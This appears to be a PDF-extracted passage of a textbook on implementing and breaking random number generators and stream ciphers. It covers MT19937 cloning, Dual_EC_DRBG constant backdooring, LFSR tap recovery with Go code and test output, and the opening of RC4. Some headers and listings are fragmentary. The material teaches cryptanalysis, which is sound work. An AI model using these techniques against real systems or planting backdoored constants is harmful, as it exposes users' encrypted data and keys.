Seed your CSPRNGs with good-quality seeds obtained from TRNGs.
Periodically reseed your CSPRNG so that the same seed is not used forever. This
helps protect against state extension attacks.
PRNGs are usually compromised by guessing their seed or by reverse-engineering
their internal states.
Linear congruential generators (LCG) are very basic (and insecure) PRNGs, there is
no difference between their state and output.
LCG-based RNGs can be broken by recovering their parameters (increment, multi-
plier, modulus) from generated values using linear algebra.
This chapter covers
Implementing and
3
ber generators (CSPRNGs) are implemented
How can CSPRNGs can be compromised via
specific weaknesses in their underlying algo-
rithms
In the previous chapter, we saw how pseudo-random number generators (PRNGs) work
in theory. In this chapter, we will implement two widely-known RNGs and then write code
to exploit them. One of them was a CSPRNG recommended by NIST (National Institute
of Standards and Technology)! 1
Init(Seed) transforms the seed to generate State0 .
As we cover two examples in this chapter we will see how those functions are imple-
mented by the respective RNGs.
1 Cryptographic implementations widely rely on algorithms and constants defined by NIST standards.
Figure 3.1 PRNGs mutate the previous state to generate the next one.
We can now tackle initialization of the internal state based on a seed value x0 . This is
equivalent to the Init(Seed) function in figure 3.1. The initialization function sets N
values of x according to the formula shown in equation 3.1, where i starts from 0 and runs
up to N − 1.
3 const (
4 W uint32 = 32 w in equation 3.1
5 N uint32 = 624 MT19937 state in listing 3.1 consists of 624 integers.
6 M uint32 = 397
7 R uint32 = 31
8
9 A uint32 = 0x9908B0DF
10 F uint32 = 1812433253 f in equation 3.1
11
12 U uint32 = 11
13 D uint32 = 0xFFFFFFFF
14
15 S uint32 = 7
16 B uint32 = 0x9D2C5680
17
18 T uint32 = 15
19 C uint32 = 0xEFC60000
20
21 L uint32 = 18
22
23 LowerMask uint32 = 0x7FFFFFFF
24 UpperMask uint32 = 0x80000000
25 )
MT19937 defines a Temper(x) function that takes a single xi and “tempers” the input
to generate a transformed output. This is similar to the Output(StateN ) function in figure
3.1, and it should be hard to reverse. Listing 3.4 implements the temper function in Go. It
utilizes some more constants from the ones we defined in listing 3.1. As we will see in the
upcoming section on exploiting our RNG, the reversibility of the Temper(x) function plays
a huge role in making MT19937 insecure. It transforms y to output y4 by performing
some complicated bit-manipulation on it but all of the operations are easily reversible for
an adversary regardless of their complexity.
After seeding and generating the first 624 values the MT19937 will have exhausted its
internal state. At that point, it defines another function called Twist(state) which takes an
existing state of 624 values and generates new 624 values to be used as the next state. This
is equivalent to the Next(StateN ) function in figure 3.1. The twist() function shown
in listing 3.5 loops from 0 to N-1 and updates each element of the state by following
some more bit manipulation techniques. The attacker does not need to understand the
details behind why the bit manipulation is done the way it is, their only goal is to reverse
the manipulations which we will in the upcoming section. The important thing to keep
in mind is that twist() will transform the current state of 624 values to generate a new
internal state with the same cardinality (i.e., exactly 624 values as before) but an entirely
new batch of numbers. The twist() function also relies on some of the constants listed
in listing 3.2.
We can now combine our temper(y) and twist() functions to write code for gener-
ating random numbers. The Generate() function shown in listing 3.6 takes the next ele-
ment in the state pointed to by mt.index and outputs it after running it through temper(y).
If mt.index runs its course of 624 values the state is refreshed by calling mt.twist() on
line 56.
To test our implementation we seed it with a fixed value and test the output against a
sequence generated by a reference implementation (you can use std::mt19937 in C++ to
generate these values). The code for this test is shown in listing 3.7.
You should run the test yourself by executing make mt19937 in the accompanying code
repository. We now have a working implementation of MT19937 that we can exploit.
The bulk of the exploit work is carried out by the CloneMT19937(mt) function which
takes an MT19937 RNG as input and clones it strictly by observing its output. The goal
of this function is to generate values using the original RNG while somehow reversing
its internal state just by using the observed values, and then use the recovered state to
construct a cloned RNG.
Listing 3.9 shows our attack function. It generates N values using the original RNG.
Each number in the internal state of the original RNG corresponds to exactly one gen-
erated value, albeit not directly. The RNG algorithm picks a number from the internal
state and transforms it using the temper(y) function. To recover the original state we call
an untemper(y) function on line 34 that will reverse this transformation. Once we have
recovered the entire state of the original RNG by “untempering” N generated values we
can construct a new RNG with this state and return that as the result of our RNG cloning
attack.
It is finally time to tackle the untempering that lies at the heart of our attack. In the
previous section we defined temper(y) in listing 3.4 that did some bit twiddling to go
from y →y1 →y2 →y3 →y4 and then returned y4. Our untemper(y) therefore needs to
go in the other direction, i.e., from y4 →y3 →y2 →y1 →y and then return the recovered
y. This is visualized in figure 3.2.
Figure 3.2 Attacker observes PRNG output and reverses operations to recover PRNG state.
Our goal is to build an intuition of how the bitwise operations are reversed. The good
news is that each step (e.g., from y2 to y3) looks pretty similar, i.e., it involves one XOR
operation (the ^ symbol), one bitwise shift operation (in the left or right direction, denoted
by « and » respectively) and one bitwise AND operation denoted by &. For example, when
the original RNG is tempering values it calculates y2 from y1 using the line shown in listing
3.10.
Listing 3.10 XOR-Shift-AND in MT19937’s temper(y) function
y2 := y1 ^ (y1<<S)&B
To understand how the reversal works, let’s look at individual bits, starting from the
original 32 bits of y1 as shown in figure 3.3.
The first transformation that takes place is the one specified inside the brackets, i.e., (y1
« S). Since S is defined as a constant in listing 3.2, we can visualize this operation as shown
in figure 3.4.
The next step is to perform bitwise AND between y1 « S (figure 3.4) and the constant
B. The individual bits of B are shown in figure 3.5.
After performing the bitwise AND between figures 3.4 and 3.5 we end up with figure
3.6. Please note that the true bits of B have the effect of “activating” the corresponding bit
in figure 3.4, which is a fundamental property of bitwise AND.
The final step for transforming y1 into y2 is to XOR the result of figure 3.6 with the
original y1, giving us figure 3.7, which is equivalent to y2.
If you look at figure 3.7 closely you will notice that y2 retains a lot of information about
y1. In fact, if we start from the right-hand side and start scanning to the left we will see
that the first 7 bits correspond exactly to y1 bits. That is, y1 0 is equal to y2 0 , y1 1 is equal to
y2 1 and so on all the way up to the seventh bit from right y1 6 .
Figure 3.7 y2 = y1 ^ (y1 » S) & B
We do not need to look at each bit being recovered to understand the attack. The main
intuition stays the same throughout the process: we reverse the bitwise operations one
by one and use earlier recovered bits to aid in calculating more bits. The complete code
for untempering y from y4 is shown in listing 3.11. Lines 15 - 24 show how we “build
the bridge” from right to left for recovering y1 from y2. Please note that the direction
of the bitwise shift operation is reversed between tempering and untempering for each
corresponding recovery.
Listing 3.11 ch03/mt19937/exploit_mt19937/exploit_mt19937.go
go test -v ./ch03/mt19937/exploit_mt19937
=== RUN TestCloneMT19937
exploit_mt19937_test.go:22: observed: bcc1df92, cloned: bcc1df92
exploit_mt19937_test.go:22: observed: d0d8875f, cloned: d0d8875f
exploit_mt19937_test.go:22: observed: d0f264cc, cloned: d0f264cc
exploit_mt19937_test.go:22: observed: 374635d9, cloned: 374635d9
exploit_mt19937_test.go:22: observed: bc6d6cc3, cloned: bc6d6cc3
--- PASS: TestCloneMT19937 (0.00s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch03/mt19937/exploit_mt19937
0.029s
We successfully cloned a PRNG just by observing its generated values, without ever
having access to the internal state of the original RNG, now we can “predict” any values
that are going to be generated by the original generator. We were able to accomplish this
because MT19937’s equivalent function of the Output(N) operation in figure 3.1 is easily
reversible.
3.2 Implementing and exploiting Dual Elliptic Curve Deterministic Ran-
dom Bit Generator
We saw how to implement and reverse the MT19937 PRNG. Our next example is one of
the most famous CSPRNGs – albeit for some pretty unfortunate reasons.
DUAL_EC_DRBG stands for Dual Elliptic Curve Deterministic Random Bit Generator.
For nine years between 2006 and 2015, it was one of the four CSPRNGs recommended
by NIST in the SP 800-90A standard. 3
The algorithm (much like the ones we covered for LCG and MT19937 generators)
relies on some mathematical constants. It is possible that the constants recommended by
NIST contained a backdoor that allowed NSA (National Security Agency) to clone any
DUAL_EC_DRBG after observing just a couple of generated values – even though it is
supposed to be cryptographically secure!
We cannot conclusively ascertain that the constants recommended by NIST did con-
tain a backdoor; instead we will see how these constants can be picked in a way that can
make the algorithm exploitable. In other words, if we were recommending constants for
DUAL_EC_DRBG we will learn how to pick them in a way that would allow us to predict
future values after observing its output.
Before we implement DUAL_EC_DRBG though we need to learn about some build-
ing blocks, starting with big numbers.
Listing 3.13 Calculating the smallest Fibonacci number with 100 digits
1 package main
2
3 import (
Running this program will print a really large number on the output (it’s a 100 digit
number that has been broken down over two lines for presentation).
13447196675861531814197166417245678868908506962757
67987106294472017884974410332069524504824747437757
As you can see, this number is much larger than what we can store in 32 (or even 64)
bits. The big package however could handle it easily because it can work with arbitrary-
precision integers.
y 2 = x 3 + ax + b (3.2)
Some example plots are shown in figure 3.9 for various values of a and b:
Go comes with the crypto/elliptic package that can be used to perform operations
on elliptic curves. We will cover elliptic curves in more detail in later chapters. For the
time being the important things to understand are:
An elliptic curve is a set of points defined by the equation 3.2.
For a given curve, addition can be performed between any two points P and Q. The
result P +Q will also lie on the curve. An analogy can be drawn in modulus arithmetic
by saying if z = (x + y) mod n then z is also an integer that is less than n, just like
x and y. The operation does not involve simply numerically adding the respective
coordinates, as that would result in a point somewhere outside of the curve. For ellip-
tic curves + denotes a special operation that satisfies various properties we need (e.g.,
P +Q = Q +P). We do not need to worry about the details of that operation right now,
Figure 3.9 Some example elliptic curves obtained by plotting equation 3.2 for different values of a and
b.
10 const (
11 Px = ”6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296”
12 Py = ”4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5”
13 Qx = ”c97445f45cdef9f0d3e05e1e585fc297235b82b5be8ff3efca67c59852018192”
14 Qy = ”b28ef557ba31dfcbdd21ac46e2a91e3c304f44cb87058ada2cb815151e610046”
15 )
The generation algorithm depends on two functions gP (x) and gQ (x). These corre-
spond to Next(...) and Output(...) in figure 3.10 respectively.
Figure 3.10 gP (x) advances the state, gQ (x) transforms it before generating an output value.
The internal state of the DUAL_EC_DRBG consists of just one bignum. The defini-
tions of gP (x) and gQ (x) rely on the scalar multiplication of this bignum with points P
and Q respectively. The result of the scalar multiplication is not, however, directly used.
Instead, two helper functions are used:
X (x, y) = x; discards the y coordinate and returns just the x coordinate.
t(x); returns the 30 least significant bytes of x. In other words, it “truncates” the input
to 30 bytes.
If the internal state of the single bignum is denoted by n, gP (x) and gQ (x) are defined
as shown in equation 3.3.
gP (n) = X (nP)
(3.3)
gQ (n) = t(X (nQ))
Equation 3.3 can be read as “to advance the RNG, perform scalar multiplication of the point
P with the internal state n and store the X-coordinate as the new state”. Similarly, the second
line can be read as “to generate a new value, perform scalar multiplication of the point Q with the
internal state and truncate the X-coordinate of the result to 30 bytes before outputting it as the next
random number”. In terms of our understanding of PRNG operation in figures 3.1 & 3.10
we can write the Next(...) and Output(...) functions as shown in equation 3.4.
N ext(StateN ) = gP (StateN −1 )
(3.4)
Output(StateN ) = gQ (StateN )
The actual code for generating the numbers is pretty minimal thanks to the crypto/elliptic
package doing most of the heavy lifting. We start by defining a type that represents a point
on the curve. When creating a new Point, we take two strings as input representing the x
and y coordinates. We then create use big.Int to parse these strings and (if they are valid
inputs) store them as two bignums (one for each coordinate). This is shown in listing 3.16.
We can now implement the RNG operations defined in the equation 3.4 in a Generate()
function as shown in listing 3.18.
And that’s it! We now have a fully functional DUAL_EC_DRBG that we can exploit
in the next section.
s0 = Seed
o0 = t(X (s0Q))
(3.5)
s1 = X (s0 P)
o1 = t(X (s1Q))
Can we predict o1 just by observing o0 ? If P and Q are related such that P = dQ, then
we can multiply s0Q with d to get s0 P as shown in equation 3.6 which really constitutes
the heart of our attack on DUAL_EC_DRBG.
d(s0Q) = s0 P (3.6)
Once we have s0 P we’ll essentially have recovered the next state s1 which means now we
can clone any output from this RNG. If P and Q were not related there would have been
no way to observe o0 and somehow deduce s1 . The flow of the attack is shown in figure
3.11.
Figure 3.11 Attacker observes Output0 and calculates State1 using the secret relationship between P
and Q
The first hurdle for our attack is to recover the point s0Q from observed output o0 . We
know that the output o0 :
Has discarded the Y-coordinate of the original point s0Q by applying the X () func-
tion.
Even the remaining X-coordinate has been truncated to 30 bytes.
Let’s think of how to reverse both of these transformations. If a point lies on a curve (or
in other words, satisfies its equation) we can calculate the Y-coordinate simply by plugging
the X-coordinate into the equation. This is analogous to looking up the stock price of a
symbol at a particular time. The stock price is the Y-coordinate with time running along
the X-axis, the statement "stock price of XYZ when the market closed yesterday" holds just
as much information as giving you the Y-coordinate value itself because the curve (i.e.,
which company’s plot we are tracking) and point in time (the X-coordinate) work just fine
for conveying the actual point in the plot.
The problem is, we do not have the entire X-coordinate. The original X-coordinate
was 32 bytes long, the output function discarded 2 bytes and gave us 30 of them. How can
we get the 2 missing bytes?
Turns out, we can kill two birds with one stone here! We could simply try all possible
values for those two bytes, i.e., from 000016 to F F F F16 and see if any of them satisfy
our elliptic curve specified by the equation 3.2, repeated here again in for the reader’s
convenience.
y 2 = x 3 + ax + b
√ (3.7)
y = x 3 + ax + b
When we try to guess all the possible values for the missing 2 bytes of our X-coordinate
only the correct guess will satisfy equation 3.7. Every guessed value of x will generate some
value when plugged into the right-hand side of the equation, but only the correct value
will have an actual square root! Not only we can guess the right X-coordinate by using the
equation it will also handily give us the Y-coordinate for continuing our attack.
Listing 3.19 shows the code for calculating the Y-coordinate for a guessed X-coordinate.
In case of wrong guesses, our calculation of the square root will fail at line 43. The calcu-
lations for our coordinates require us to pick a curve (i.e., a set of values for a and b) that
would satisfy equation 3.7. We do this by using a standard curve called P256 on line 36.
P = dQ (3.8)
Since P is fixed on the left-hand side by the standard curve definition itself, we have
to find a Q that would satisfy the same relationship. We cannot randomly pick any Q, as
P would not be a multiple of those values. Instead, we start by picking a random (scalar)
value for d. We then find the modular inverse of d and call it e. Now we can multiply both
sides by e to get us equation 3.9.
eP = edQ
(3.9)
eP = Q
Instead of randomly picking a point Q and multiplying it with a random scalar d to get
a secretly related P, we went the other way around. Point P was fixed by the P256 curve,
we generated a random scalar d, found its modular inverse and used that to calculate a
backdoor-ed point Q. The code for finding the backdoor-ed constants is shown in listing
3.20.
Let’s write a test for our exploit as shown in listing 3.21. We will generate backdoor-
ed constants and use those to instantiate a DUAL_EC_DRBG RNG with these constants.
We then call CloneDualEcDrbg(...) on line 49 that takes the original RNG, the constants
as well the secret value d that will be used to compromise the RNG operation.
Listing 3.21 ch03/dual_ec_drbg/exploit_dual_ec_drbg/exploit_dual_ec_drbg_test.go
If you run the accompanying test using make dual_ec_drbg, you will see the test try
a few candidate values for x before finding the right one and then cloning the RNG. The
output is shown below (truncated for presentation):
go test -v ./ch03/dual_ec_drbg/exploit_dual_ec_drbg
=== RUN TestBackdoorConstants
--- PASS: TestBackdoorConstants (0.00s)
=== RUN TestCalculateYCoordinate
--- PASS: TestCalculateYCoordinate (0.00s)
=== RUN TestCloneDualEcDrbg
check: 2774d76eacc0c20b17de4d0958cfe6882fa9132cd2951f0eaba97d930a85
next_o: 2774d76eacc0c20b17de4d0958cfe6882fa9132cd2951f0eaba97d930a85, guess:
DCD2
exploit_dual_ec_drbg_test.go:60: observed=19fc85d9..., cloned=19fc85d9...
exploit_dual_ec_drbg_test.go:60: observed=9e12c097..., cloned=9e12c097...
exploit_dual_ec_drbg_test.go:60: observed=3ec6b2a4..., cloned=3ec6b2a4...
exploit_dual_ec_drbg_test.go:60: observed=01cf30cc..., cloned=01cf30cc...
exploit_dual_ec_drbg_test.go:60: observed=91d0b390..., cloned=91d0b390...
--- PASS: TestCloneDualEcDrbg (6.11s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch03/dual_ec_drbg/
exploit_dual_ec_drbg 6.124s
Congratulations, you have now implemented and exploited a bona fide CSPRNG by
performing a state-extension attack on it!
3.3 Summary
MT19937 are widely-used RNGs where the internal state consists of 624 values. It is
pretty straightforward to reverse one state value based on one output, and therefore
only 624 output values are needed to compromise the entire internal state of the
RNG (allowing an attacker to predict all future values).
DUAL_EC_DRBG is a CSPRNG but its constants can be backdoor-ed in a way
that can enable the attacker to predict all future values by observing only a couple of
generated values.
(CS)PRNGs can be compromised by reversing or predicting their internal states by
only observing the generated values. The PRNG functions Next(...) and Output(...)
should make such reversals hard for an attacker.
This chapter covers
What is symmetric key encryption and what
would make a symmetric encryption algorithm
“perfect”?
Stream ciphers
4
What is the exclusive-or (XOR) operation, and
how is it important for cryptography?
How can unbreakable encryption be achieved
with one-time pad (OTP) and what are the prac-
tical limitations of this approach?
What are stream ciphers, and how are they
related to one-time pad?
Implementing and exploiting linear-feedback shift
registers (LFSRs) as stream ciphers
Implementing and exploiting the RC4 stream
cipher
One of the core goals of cryptography is to provide confidentiality. Stream ciphers are
algorithms that help achieve confidentiality by encrypting plaintext one bit or one byte
at a time. They are used quite heavily in systems with limited computing power (e.g.,
embedded devices) or where performance requirements are quite high (e.g., for real-time
encryption of video calls). This chapter will explain what stream ciphers are, how they are
generally used and how attackers circumvent them.
As it happens, there is already a perfect unbreakable algorithm for achieving this. It just
comes with some practical limitations that prevent it from becoming “one encryption al-
gorithm to rule them all.” Understanding those limitations will also shed further light on
the distinctions between cryptographic theory and implementation; but before we get to
the limitations, let’s first discuss what would it mean for an encryption algorithm to be
“perfect”.
In chapter 1 we also briefly touched upon Kerckhoff’s principle, which stated that a cryp-
tosystem should be secure even if an attacker knows everything about the system except
the key. This was phrased by Claude Shannon (commonly known as the “father of infor-
mation theory”) as “the enemy knows the system”. Shannon went on to describe precisely
what would it mean for an encryption algorithm to provide perfect security: the cipher-
text should provide no information about plaintext without the knowledge of the secret key.
“Shannon ciphers” are symmetric encryption algorithms that satisfy this criterion.
Perfect security
An encrypted message must provide no information about the original plaintext unless
you have the secret key.
x y z=x⊕y
T T F
T F T
F T T
F F F
Table 4.1 Truth-table (inputs and output) for the XOR operation
“Exclusive” refers to the fact that the result is true only if one of the inputs is exclusively
true (i.e., the other one is false). We apply the exclusivity principle in daily life all the time.
For example, dual nationality is expressly forbidden for people born in certain countries.
They can be a citizen of their birth country or immigrate and get naturalized in a new
one, but they cannot legally retain citizenship of both countries (true ⊕ true is false). For a
given world cup, a country can either win or lose the tournament but not both. Biological
organisms are either dead or alive (most of the time) and so on.
As it turns out, this almost wickedly simple operation protects the world’s information
by serving as a fundamental building block of cryptography. Let’s see how.
Imagine that x is the plaintext in figure 4.1; y is the key and the result of the XOR
operation is the ciphertext, as shown in figure 4.2. This would give us the truth table shown
in table 4.2 (figure 4.2).
If you receive ciphertext z and know the key y, you can simply XOR them back to get
x. In other words we start from the right-most column (ciphertext) in table 4.2 and XOR
it with the middle column (key) to get back the left-most column (plaintext). For example,
if you receive the ciphertext 0 and the key is 1 (the bottom row); exclusive-or would result
in plaintext 1. If you read the row the other way around in terms of encryption you’ll see
that encryption is just left to right while decryption is right to left. It might be helpful to
do this exercise for all four rows to grok the idea. In a nutshell, encrypting and decrypting
a piece of data under the same key produces back the original data when using XOR as an
encryption algorithm.
Figure 4.2 Usage of XOR as a symmetric encryption algorithm
If an attacker gets hold of the ciphertext and does not know the key, can they “guess” the
plaintext? Let’s say the ciphertext is a 1 (the two middle rows in table 4.1). Since the key is
unknown, both plaintexts (0 or 1) are equally possible. In other words, ciphertext provides
no information about the plaintext, making it perfectly secure.
XOR therefore satisfies two important criteria as an encryption algorithm:
When using the same key, decryption produces the original plaintext for a corre-
sponding ciphertext.
For a given ciphertext, if the key is unknown to the attacker, all plaintexts are equally
probable as the original message.
Imagine that you use this algorithm with your own secret key that you use to commu-
nicate with your close friends. An attacker eavesdrops on your communications and gets
a hold of bunch of ciphertexts. They don’t know the key, but they guess that some of the
plaintexts probably start with “Hello” or some variation on common greetings. From there
they can recover first few bytes of the key by rearranging the terms of equation 4.1. This is
actually a quite powerful technique, a variant of which was used to break the WEP protocol
(the first iteration of engineers trying to provide Wi-Fi security), we will discuss it in detail
in the upcoming sections and implement the exploit ourselves. For now, let’s familiarize
ourselves with the rearranged equation 4.2 to see how parts of the key can be recovered
by XORing the ciphertext and plaintext.
So, we have a few major challenges in using OTP or XOR as one encryption algorithm
to rule them all:
The key must be at least as long as the plaintext.
The key must be truly random.
The key must not be reused.
Imagine a TRNG generates as many bytes as needed for a plaintext. These bytes are
shared as the key with the intended recipient of our communication. Now, we can send
one plaintext of that length and assuming the attacker does not get a hold of the key we
attain perfect security.
Now imagine that the plaintext is actually a video or some high-resolution photo or an
entire dossier. You would need to generate new keys sometimes gigabytes long, somehow
transport those securely to the recipient and then send ciphertexts separately.
This all sounds highly impractical but for specialized use-cases it actually isn’t. For ex-
ample, two parties could use some clever interpretation of some specific phone directories
as “keys” and then use one-time pad to encrypt small (one-liners) messages. Around hun-
dred years ago this actually could have provided some significant level of security assuming
the attacker wasn’t familiar with what was being used for the key. These days however even
if the source of the key was not known the fact that phone directories are poor sources of ran-
domness would allow sophisticated adversaries to crack the key even without knowing the
specific booklet that was being used to generate it.
The problem of needing a key as long as the plaintext can be solved by using a CSPRNG.
The CSPRNGs takes a “seed” as input and generate a stream of pseudorandom bytes. We
can use those bytes as the key to one-time pad as shown in figure 4.3. The “seed” of the
CSPRNG can then become a shortened version of the key that can be shared with the
recipient. Instead of generating and sharing a random key of 5 gigabytes to share a video
file, you can simply share a few hundred bytes of seed and then run the CSPRNG to
generate a “keystream”.
Figure 4.3 Stream ciphers: CSPRNG providing input key to a one-time pad
Cryptographic nonces
Many cryptographic algorithms require nonce: short for “number used once”. These
are random bits that are communicated publicly – and are hence known to attackers
– but add unpredictability to the results of such algorithms.
We shall now look at two stream ciphers, implement them, and then exploit them using
their specific weaknesses.
Figure 4.4 Stream ciphers versus block ciphers
A linear feedback shift register works similarly. At each step it moves the internal contents
one bit in some direction, outputs the “ejected” bit as the result of that iteration and then
XORs some of the previous bits to generate a new “shift” bit that it inserts at the other end
to keep things moving. A few iterations of an example LFSR are shown in figure 4.6 – if
you squint hard enough you might be able to see an ouroboros!
Figure 4.6 A “linear feedback” shift register showing execution of first few steps
12 package impl_lfsr
13
14 type LFSR struct {
15 length int
16 taps []byte
17 state []byte
18 }
19
20 func NewLFSR(length int, taps []byte, state []byte) *LFSR {
21 lfsr := &LFSR{
22 length,
23 make([]byte, len(taps)),
24 make([]byte, len(state)),
25 }
26
27 copy(lfsr.state, state)
28 copy(lfsr.taps, taps)
29
30 for i := 0; i < length; i++ {
31 lfsr.GenerateBit()
32 }
33
34 return lfsr
35 }
Figure 4.7 An LFSR providing the keystream for encryption using XOR
The output of an LFSR can be used as the “keystream” for a XOR function to simulate
a one-time pad as shown in figure 4.7. This would make the initial state of the LFSR the
“key” for our encryption. The distinction between the key and the keystream is important
to understand. The key is what you use to start the LFSR in a manner of speaking. The
keystream is what actually gets XORed with the plaintext. Let’s say the initial key is the
Wi-Fi password. If an attacker could somehow compromise a keystream they can decrypt
a packet that was encrypted using this particular keystream. They still cannot craft new
packets however that would be decrypted correctly by their router. If they knew the seed
however – the equivalent of Wi-Fi password – they would be able to craft correctly en-
crypted packets of their own. Fortunately, while Wi-Fi uses stream ciphers it does not use
LFSRs. Unfortunately, the first few iterations of Wi-Fi security did use a different stream
cipher (RC4) that turned out to be insecure – which we will implement & exploit in the
next section.
Before we are going to use our LFSR for encryption though let’s try to put some dis-
tance between the key and the keystream. Lines ?? - ?? in listing 4.1 show the LFSR “wast-
ing” the first N bits where N is equal to the length of the LFSR. This simply flushes out
the initial key bits, making sure encryption only happens by XORing plaintext with a linear
combination of the original key but not the original key itself.
The workhorse of our LFSR implementations is the GenerateBit() function shown in
listing 4.2. This corresponds closely to the operation shown in figure 4.6. We store the old
“right-most” bit in outputBit. Lines 40 - 42 calculate the new “shift-in” bit by traversing
all bits of the LFSR state and XORing those where a tap is active at the corresponding
index. Lines 44 - 46 move the contents of all registers one position to the right, and we
finally set the left most bit in the LFSR state to the newly calculated shift bit.
The test cases for this LFSR implementation can be found in the accompanying code
repo at: github.com/krkhan/crypto-impl-exploit
s3 = a0 s0 + a1 s1 + a2 s2
s4 = a0 s1 + a1 s2 + a2 s3 (4.5)
s5 = a0 s2 + a1 s3 + a2 s4
Equation 4.4 can then be represented in the form of a matrix as represented in equation
4.6.
s3 s0 s1 s2 a0
s4 = s1 s2 s3 a1
(4.6)
s5 s2 s3 s4 a2
X = SA
S is the “state matrix” and denotes internal contents of the LFSR. A is the “coefficient
matrix” and represents the LFSR taps. X represents L new bits that are obtained by the
linear combination of S and A.
We can find the coefficient matrix A by inverting S, collecting enough bits for filling X
and then solving for A as shown in equation 4.7.
A = S −1 X (4.7)
We will use the matrix Go module from the OpenWhiteBox (github.com/OpenWhiteBox
/primitives/matrix) project for matrix inversion. Since we are dealing with “boolean” ma-
trices (they will only contain zeros or ones), the module also takes care of the fact that their
addition and multiplication are in fact bitwise XOR and bitwise AND respectively.
1 package exploit_lfsr
2
3 import (
4 ”errors”
5
6 ”github.com/OpenWhiteBox/primitives/matrix”
7 ”github.com/krkhan/crypto-impl-exploit/ch04/lfsr/impl_lfsr”
8 )
9
10 const MaxLfsrLength = 256
11
12 func RecoverLFSRWithKnownLengthFromObservedBits(observedBits []byte,
lfsrLength int) (*impl_lfsr.LFSR, error) {
13 if len(observedBits) < lfsrLength*2 { Do we have enough bits to fill sMatrix?
14 return nil, errors.New(”insufficient observed bits”)
15 }
16
17 sMatrix := matrix.GenerateEmpty(lfsrLength, lfsrLength)
18 for i := 0; i < lfsrLength; i++ { This is logically
19 for j := 0; j < lfsrLength; j++ { equivalent to:
20 sMatrix[i].SetBit(j, observedBits[i+j] != 0x00) sMatrix[i][j]
21 } = observedBits[i+j]
22 }
23
24 sInvertMatrix, ok := sMatrix.Invert()
25 if !ok {
26 return nil, errors.New(”invert matrix does not exist”)
27 }
28
29 xMatrix := matrix.GenerateEmpty(lfsrLength, 1)
30 for i := 0; i < lfsrLength; i++ {
31 xMatrix[i].SetBit(0, observedBits[lfsrLength+i] != 0x00)
32 }
33 tapsMatrix := sInvertMatrix.Compose(xMatrix) A = S −1 X
34
35 recoveredTaps := make([]byte, lfsrLength) This converts
36 for i := 0; i < lfsrLength; i++ { tapsMatrix to a
37 recoveredTaps[lfsrLength-i-1] = tapsMatrix[i].GetBit(0) regular byte slice
38 } of size
39 lfsrLength
40 recoveredState := make([]byte, lfsrLength)
41 for i := 0; i < lfsrLength; i++ {
42 recoveredState[i] = observedBits[len(observedBits)-1-i]
43 }
44
45 return impl_lfsr.NewLFSR(lfsrLength, recoveredTaps, recoveredState), nil
46 }
The function shown on line 12 of listing 4.4 takes a slice of observed bits and the length
of the LFSR it is trying to recover. At line 13 we check if we have enough bits to fill up
the square matrix S in equation 4.6. Lines 17 - 22 fill sMatrix with the observed bits by
calling the SetBit() method on each row of the newly created matrix. Line 24 tries to
calculate S −1 . This step will fail if the bitstream is not the output of an LFSR (i.e., the
bitstream is not a linear combination), or if we have provided the wrong length for the
LFSR. We then generate the single column xMatrix containing lfsrLength number of
rows. We finally implement equation 4.7 on line 33. Lines 35 - 38 convert tapsMatrix
back to a regular byte slice on. Now that we have the tap positions reversed we can create
our own cloned LFSR, but we need to put it in the same state as the one we are trying
to exploit. Fortunately this part is easy, the last lfsrLength bits of observed bits actually
tell us the LFSR state in lines 40 - 43. The last line in the function returns a new LFSR
created using the taps and state we just recovered.
REVERSING LFSR TAPS WHEN ITS LENGTH IS NOT KNOWN
In the previous section we recovered taps for an LFSR by observing its output and
constructing matrices related to the LFSR’s length L. If we are observing output of a totally
unknown LFSR and have no clue about the length can we still crack it?
There is a really sophisticated solution to this problem known as the Berlekamp-Massey
algorithm. It finds the shortest LFSR (taps and initial state) that would produce any given
binary sequence. Although the algorithm is simple to implement and beautiful to see in
action, it is hard to understand why it works without a deep mathematical context and
explanation – it is after all named after two Shannon award winners (the Nobel Prize of
information theory); James Massey & Elwyn Berlekamp. As I struggled with grokking why
it works I thought of a rather ugly workaround: we can just try all lengths one by one. All
lengths fail on line 24 of listing 4.4 (the matrix inversion) until we hit the correct length.
LFSRs lengths are usually not that huge – even a 32 bit long LFSR can have a period
greater than 4 billion. Running our matrix reversal exploit 32 times would take less than a
second on our modern laptops. Therefore, since the bruteforce solution is quite practical
and much simpler to understand we’ll use that for our exploit instead of the more efficient
Berlekamp-Massey algorithm. Listing 4.5 shows us trying different LFSR lengths until we
recover one without error.
To test our exploit we simulate a scenario where an attacker knows a prefix but not the
entire plaintext. That is, the attacker knows that the plaintext message starts with ATTACK
AT but does not know what comes after it. The attacker intercepts a ciphertext and knows
that it was encrypted using an LFSR. Listing 4.6 shows the function that will be used to
simulate this scenario and generate an attack message.
Listing 4.7 generates an encrypted attack message and then recovers the LFSR used
to encrypt it by using the known plaintext. Line 107 corresponds to equation 4.2 for re-
versing the keystream by XORing the known plaintext bytes with corresponding cipher-
text bytes. Lines 108 - 110 “expand” the keystream byte into individual bits to be pro-
cessed by the functions we have defined so far. Line 112 clones the LFSR using observed
keystream bits (so that we can decrypt the remaining ciphertext where we do not know
the corresponding plaintext). Line 117 “decrypts” the ciphertext by encrypting it with the
recovered LFSR. We saw previously that for XOR, encryption and decryption are the
same operation so if we have reversed the LFSR correctly we should get back the original
plaintext. Running the LFSR tests by executing make lfsr generates the output shown in
listing 4.8.
...
=== RUN TestKnownPlaintextAttack
exploit_lfsr_test.go:104: Ciphertext: ”e\xc67gWL.\x7f\xdd08\x8d0J\xaaFQL
:\x90(\xfd\xf6\xcb\x10\x1b/E\xfd\x1f:\xa4\x06\x1a\xae\x83x\x9c2”
exploit_lfsr_test.go:118: Decrypted message: ATTACK AT 2024-01-10
11:25:35 -0800 PST
--- PASS: TestKnownPlaintextAttack (0.00s)
...
Figure 4.8 RC4 internal state: a 256 byte S-box and two pointers i & j
Like other stream ciphers, RC4 generates a keystream as output. Unlike LFSRs though
RC4 generates the keystream one byte at a time (as opposed to individual bits generated by
each LFSR cycle). These bytes are subsequently used as keystream for XORing with the
plaintext. RC4 internal state consists of two parts shown in figure 4.8.
An “S-box” (substitution box) containing 256 bytes. The S-box is started by filling
each location with its index (i.e., index 6 would contain the byte 0x06 and so on) and
then shuffling them around by following the algorithm steps. This ends up making the
S-box a permutation: each number from 0-255 will appear in the S-box exactly once
at all times, but the locations keep changing. Think of filling a box with bunch of rocks
